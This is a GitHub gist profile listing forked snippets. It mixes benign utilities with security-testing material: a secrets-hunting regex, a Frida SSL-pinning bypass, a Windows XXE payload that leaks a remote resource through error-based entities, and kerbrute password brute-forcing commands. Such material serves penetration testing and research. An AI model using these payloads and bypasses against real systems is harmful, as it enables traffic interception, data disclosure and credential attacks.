Skip to content

Instantly share code, notes, and snippets.

View dslusser's full-sized avatar

dslusser

12 followers · 28 following
View GitHub Profile
@dslusser
dslusser / js_endpoints_new_tab.js
Created December 21, 2024 19:55 — forked from mhmdiaa/js_endpoints_new_tab.js
All credit goes to @renniepak for the original bookmarklet https://twitter.com/renniepak/status/1602620834463588352
javascript: (function() {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
const results = new Set;
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t && fetch(t).then(function(t) {
return t.text()
}).then(function(t) {
var e = t.matchAll(regex);
@dslusser
dslusser / Generic keys
Created October 3, 2024 23:42 — forked from h4x0r-dz/Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@dslusser
dslusser / universalUnpin.js
Created September 27, 2024 14:39 — forked from teknogeek/universalUnpin.js
Frida Universal™ SSL Unpinner
Java.perform(function() {
console.log('\n[.] Cert Pinning Bypass');
// Create a TrustManager that trusts everything
console.log('[+] Creating a TrustyTrustManager that trusts everything...');
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var TrustyTrustManager = Java.registerClass({
name: 'com.example.TrustyTrustManager',
implements: [X509TrustManager],
methods: {
@dslusser
dslusser / gist:2e5b3b32d81a66638dc1dd6eb208c17d
Created April 2, 2024 14:56 — forked from Rhynorater/gist:d0d19f757221a916a22476c3a5c6aba2
Shubs Windows XXE Payload
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
@dslusser
dslusser / getAllGlobals.js
Created April 2, 2024 14:52 — forked from colinrubbert/getAllGlobals.js
Get all runtime global variables set by the app
/**
* RuntimeGlobalsChecker
*
* You can use this utility to quickly check what variables have been added (or
* leaked) to the global window object at runtime (by JavaScript code).
* By running this code, the globals checker itself is attached as a singleton
* to the window object as "__runtimeGlobalsChecker__".
* You can check the runtime globals programmatically at any time by invoking
* "window.__runtimeGlobalsChecker__.getRuntimeGlobals()".
*
@dslusser
dslusser / download_canvas_rubric.js
Last active September 14, 2023 21:31 — forked from acbart/download_canvas_rubric.js
Snippet to download Canvas rubric data for current assignment as a CSV file
(async function(){
// More info on usage - dws:
// https://community.canvaslms.com/t5/Canvas-Developers-Group/Rubric-Analysis-Using-the-API/ba-p/270213
// Basically just copy/paste this script to the Developer Tools -> Console tab on any Canvas Assignment page
// that has a rubic as a grading method.
// Original Github Gist: https://gist.github.com/acbart/0bfd1b2dbc324b345c305e362e00273c
// https://stackoverflow.com/questions/8735792/how-to-parse-link-header-from-github-api
@dslusser
dslusser / AppleScript Mail Send.scpt
Created February 8, 2023 19:25 — forked from youandhubris/AppleScript Mail Send.scpt
AppleScript to send e-mail, using Apple's Mail, with multiple recipients, cc, bcc and attachments
tell application "Mail"
set theFrom to ""
set theTos to {}
set theCcs to {}
set theBccs to {}
set theSubject to ""
set theContent to ""
set theSignature to ""
@dslusser
dslusser / kerberos_attacks_cheatsheet.md
Created February 5, 2022 04:58 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@dslusser
dslusser / makekali.sh
Last active January 21, 2021 20:25 — forked from warecrash/makekali.sh
Convert Debian to Kali
apt update
apt -y install wget gnupg dirmngr
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
echo "deb http://http.kali.org/kali kali-last-snapshot main non-free contrib" >> /etc/apt/sources.list
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -
apt update
apt -y upgrade
apt -y dist-upgrade
@dslusser
dslusser / index.html
Created February 11, 2019 16:58
Medium clap effect w/ ReactJS
<div id="app"></div>
<aside id="message">In case you didn't know, you gotta click the clap button above 😎😜😜
<br />
<a href="https://twitter.com/OhansEmmanuel" target="_blank">@ohansemmanuel</a>
<br />
<a href="https://codepen.io/ohansemmanuel/full/dVdvJQ/"
target="_blank">
See Vanilla JS implementation
</a>
</aside>